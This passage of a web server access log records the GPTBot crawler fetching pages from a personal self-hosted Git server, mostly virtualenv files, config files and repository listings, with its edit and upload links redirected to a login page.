"/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/Activate.ps1" -[17/Feb/2026:15:31:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/Activate.ps1" -[17/Feb/2026:15:31:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip" -[17/Feb/2026:15:31:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 9948] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/activate.csh" -[17/Feb/2026:15:31:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/Activate.ps1" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/Activate.ps1" -[17/Feb/2026:15:31:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate.csh" -[17/Feb/2026:15:31:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3.12" -[17/Feb/2026:15:32:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/python3.12" -[17/Feb/2026:15:32:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 11556] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:32:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?q=&sort=mostcomplete&state=closed" [Client 74.7.227.38] [Length 8512] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?sort=furthestduedate&state=closed" -[17/Feb/2026:15:32:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?q=&sort=mostissues&state=closed" [Client 74.7.227.38] [Length 8512] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?sort=furthestduedate&state=closed" -[17/Feb/2026:15:32:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?q=&sort=leastissues&state=closed" [Client 74.7.227.38] [Length 8511] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?sort=furthestduedate&state=closed" -[17/Feb/2026:15:32:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?q=&sort=furthestduedate&state=closed" [Client 74.7.227.38] [Length 8508] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?sort=furthestduedate&state=closed" -[17/Feb/2026:15:32:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?q=&sort=leastcomplete&state=closed" [Client 74.7.227.38] [Length 8506] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?sort=furthestduedate&state=closed" -[17/Feb/2026:15:32:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?q=&sort=closestduedate&state=closed" [Client 74.7.227.38] [Length 8508] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?sort=furthestduedate&state=closed" -[17/Feb/2026:15:32:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?files=html%2findex.html" [Client 74.7.227.38] [Length 20231] [Gzip 3.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" -[17/Feb/2026:15:32:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/status.json?display=source" [Client 74.7.227.38] [Length 11072] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/status.json" -[17/Feb/2026:15:32:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/tsconfig.json?display=source" [Client 74.7.227.38] [Length 11867] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/tsconfig.json" -[17/Feb/2026:15:32:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/package.json?display=source" [Client 74.7.227.38] [Length 11682] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/package.json" -[17/Feb/2026:15:32:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 10424] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3.12" -[17/Feb/2026:15:32:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/pip3.12" -[17/Feb/2026:15:32:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/i18n.js?display=source" [Client 74.7.227.38] [Length 24522] [Gzip 5.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/i18n.js" -[17/Feb/2026:15:32:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/letsencrypt" [Client 74.7.227.38] [Length 10089] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt/renewal" -[17/Feb/2026:15:32:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:15:32:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:15:32:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:15:32:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/pip3.12" -[17/Feb/2026:15:32:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3.12" -[17/Feb/2026:15:32:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10874] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.gitignore" -[17/Feb/2026:15:32:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/PostgresPatrol/README.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol" -[17/Feb/2026:15:32:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/PostgresPatrol/README.md" -[17/Feb/2026:15:32:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/services/geminiService.ts?display=rendered" [Client 74.7.227.38] [Length 10945] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/services/geminiService.ts" -[17/Feb/2026:15:32:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 9950] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/1.conf" -[17/Feb/2026:15:32:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 9949] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/4.conf" -[17/Feb/2026:15:32:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/letsencrypt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt" -[17/Feb/2026:15:32:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/letsencrypt" -[17/Feb/2026:15:32:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_upload/main/npm/letsencrypt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt" -[17/Feb/2026:15:32:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/npm/letsencrypt" -[17/Feb/2026:15:32:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/npm/letsencrypt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt" -[17/Feb/2026:15:32:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/npm/letsencrypt" -[17/Feb/2026:15:32:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/letsencrypt" [Client 74.7.227.38] [Length 9817] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/letsencrypt" -[17/Feb/2026:15:32:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 9949] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/2.conf" -[17/Feb/2026:15:32:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 10168] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/nginx/proxy_host/3.conf" -[17/Feb/2026:15:32:17 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/assets/images/BatchControl.png" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a.diff" -[17/Feb/2026:15:32:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 20580] [Gzip 6.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs" -[17/Feb/2026:15:32:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3.12" [Client 74.7.227.38] [Length 9936] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/pip3.12" -[17/Feb/2026:15:32:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python3.12" -[17/Feb/2026:15:32:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 11502] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:32:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 10420] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/pip" -[17/Feb/2026:15:32:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/dotenv" [Client 74.7.227.38] [Length 11533] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:32:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 13487] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:32:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip" [Client 74.7.227.38] [Length 10388] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/pip" -[17/Feb/2026:15:32:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.csh" [Client 74.7.227.38] [Length 12156] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:32:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 11492] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:32:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 13519] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin" -[17/Feb/2026:15:32:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_http_access.log" [Client 74.7.227.38] [Length 24917] [Gzip 